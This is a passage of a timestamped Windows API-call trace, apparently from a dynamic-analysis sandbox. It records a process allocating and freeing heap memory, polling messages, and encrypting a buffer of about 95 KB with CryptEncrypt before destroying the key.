dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0199.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0199.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0199.152] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0199.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0199.153] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.153] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.153] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0199.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.153] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.153] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.153] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.153] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.153] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.153] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.154] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.154] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.154] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.154] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.154] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0199.154] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.154] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.155] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x17682, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x17690) returned 1 [0199.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.155] CharLowerBuffW (in: lpsz="byte[95889]", cchLength=0xb | out: lpsz="byte[95889]") returned 0xb [0199.155] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.156] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.156] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.157] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.159] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8dd28*, pdwDataLen=0x87e820*=0x17682, dwBufLen=0x17690 | out: pbData=0xa8dd28*, pdwDataLen=0x87e820*=0x17690) returned 1 [0199.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.162] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.162] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.162] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.162] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0199.162] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.162] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0199.162] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.162] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.162] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0199.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.170] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.170] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.170] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.177] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.177] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.177] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0199.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.177] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.177] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.177] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0199.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.177] CryptDestroyKey (hKey=0x90aed8) returned 1 [0199.178] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.178] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.178] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.178] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.178] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.178] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.178] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0199.178] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0199.178] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0199.178] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0199.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.179] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.179] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0199.179] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0199.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.179] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.179] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.189] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0199.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0199.189] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0199.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: 